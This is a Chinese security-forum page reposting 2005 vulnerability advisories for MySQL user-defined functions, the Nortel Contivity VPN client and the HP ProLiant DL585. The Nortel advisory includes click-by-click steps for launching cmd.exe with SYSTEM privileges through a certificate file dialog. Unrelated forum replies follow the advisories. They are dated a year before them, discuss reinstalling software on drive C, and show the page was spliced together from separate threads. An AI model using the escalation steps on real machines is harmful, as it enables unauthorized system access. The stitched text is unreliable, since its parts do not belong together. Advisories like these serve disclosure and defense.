MySQL用户定义函数多个安全漏洞

发布日期:2005-08-13
更新日期:2005-08-13

受影响系统:
MySQL AB MySQL 5.0.XX
MySQL AB MySQL 4.1.XX
MySQL AB MySQL 4.0.XX
描述:
--------------------------------------------------------------------------------
MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。

攻击者可以通过特制的CREATE FUNCTION请求导致系统停止,或执行任意代码,具体如下:

1) 如果攻击者能够要求基于Windows的MySQL服务器加载无效的库文件的话,应用程序就会挂起,直到服务器上确认了对话框。通过请求Windows默认安装PATH中包含的一个或多个非库文件,攻击者可以导致服务器终止。这是由于在加载无效的库文件时Windows函数LoadLibraryEx()会中止,给出以下消息:

"The application or DLL XXXX is not a valid Windows image. Please
check this against your installation diskette."

应注意这个漏洞仅影响Windows平台,其他操作系统不受影响。

2) MySQL要求任何UDF库都定义了XXX_deinit()或XXX_init()函数以过滤任意函数库执行,但这个函数命名规则过于通用,默认函数库也可能定义了这些函数。

例如,Windows 2000默认捆绑的“jpeg1x32.dll”和“jpeg2x32.dll”库也定义了这些函数,这就允许攻击者从“jpeg1x32.dll”加载jpeg_cmp() 函数,或从“jpeg2x32.dll”加载jpeg_decmp()函数。如果调用了任何一个上述函数的话,MySQL守护程序都会由于错误的参数传递而崩溃。

jpeg_cmp_init()和jpeg_decmp_init()函数都假设栈中有6个参数在等待。其中的一个参数Arg 6(EBP+0x1C)是指向内存位置的指针,然后传送给这个函数的其他参数会覆盖这个指针后的内存。由于在这个调用前没有使用Arg 4(EBP+0x14)到Arg 6(EBP+0x1C),因此攻击者就可以破坏栈,覆盖任意内存位置。

        Team SHATTER (shatter@appsecinc.com)
 
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112360818900941&w=2
*>

建议:
--------------------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 限制创建用户定义函数。

厂商补丁:

MySQL AB
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mysql.com/
发布于 由 iver 有 0 篇评论
2005年8月13日 15:18
Nortel Contivity VPN客户端本地权限提升漏洞
 
Nortel Contivity VPN客户端本地权限提升漏洞

发布日期:2005-08-13
更新日期:2005-08-13

受影响系统:
Nortel Networks Contivity VPN Client V05_01.030
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 14542

Contivity VPN客户端是一款Windows应用程序,允许用户定义并存储连接信息,这样就可以通过Contivity安全IP服务网关访问企业网。

Nortel Contivity VPN客户端存在本地权限提升漏洞,本地用户可能利用此漏洞提升自己在系统中的权限。

起因是应用程序没有正确的降低运行进程的权限。在本地用户打开对话框选择数字证书时,就可以启动任意文件。由于应用程序没有正确的还原用户权限,可能会以系统权限执行文件,这样本地用户就可能以系统权限执行任意文件。

Jeff.Peadro@gmail.com)
 
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112370730131219&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

1. 在Contivity客户端点击“选项”,选择“认证选项”

2. 选择“电子证书认证委托”,点击“确定”

3. 在证书框右侧,点击按键图标,选择“打开”

4. 将文件类型更改为“所有文件”,然后导航至system32目录,找到cmd.exe。右击cmd.exe并选择“打开”

这样就会以本地系统权限运行命令行提示符。

建议:
--------------------------------------------------------------------------------
厂商补丁:

Nortel Networks
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.nortelnetworks.com/index.html
发布于 由 iver 有 0 篇评论
2005年8月13日 15:18
HP Proliant DL585 Server远程非授权访问漏洞
 
HP Proliant DL585 Server远程非授权访问漏洞

发布日期:2005-08-13
更新日期:2005-08-13

受影响系统:
HP Proliant DL585 Server
HP Proliant DL585 Integrated Lights Out 1.80
不受影响系统:
HP Proliant DL585 Integrated Lights Out 1.81
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 14540

HP ProLiant DL585是拥有4路x86机架式服务器,在系统中采用AMD Opteron处理器技术。

HP Proliant DL585 Server中存在非授权访问漏洞,如果服务器断电的话,远程攻击者就可以控制服务器。

目前更多信息不详。

security-alert@hp.com)
 
  链接:http://www2.itrc.hp.com/service/cki/docDisplay.do?hpweb_printable=true&docId=HPSBMA01220
*>

建议:
--------------------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在服务器断电时拔掉电源线。

厂商补丁:

HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://itrc.hp.com
发布于 由 iver 有 0 篇评论




COPYRIGHT©2005 valala.com  All rights reserved.   




[此贴被 20cn浪漫特洛(xww8258) 在 09月26日21时50分 编辑过]


[此贴被 20cn浪漫特洛(xww8258) 在 09月26日21时54分 编辑过]

地主 发表时间: 04-02-19 20:43

回复: iceeyes [iceeyes]   论坛用户   登录
在的,就是安装的软件都不能用了。

B1层 发表时间: 04-02-19 20:44

回复: angelj517 [angelj517]   论坛用户   登录
只要你不搁D及E盘~~就好了`~软件如果只装在D或E~就没有关系`但如果是C盘``那就都要重装``

B2层 发表时间: 04-02-19 21:29

回复: angelj517 [angelj517]   论坛用户   登录
只要你不搁D及E盘~~就好了`~软件如果只装在D或E~就没有关系`但如果是C盘``那就都要重装``

B3层 发表时间: 04-02-19 21:31

回复: rainydiy [rainydiy]   论坛用户   登录
不呀

你还能用那些

B4层 发表时间: 04-02-19 21:34

回复: morgan [morgan]   论坛用户   登录
有些如杀毒等的可能不可以用了,但游戏方面的应该没有问题

B5层 发表时间: 04-02-19 22:31

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号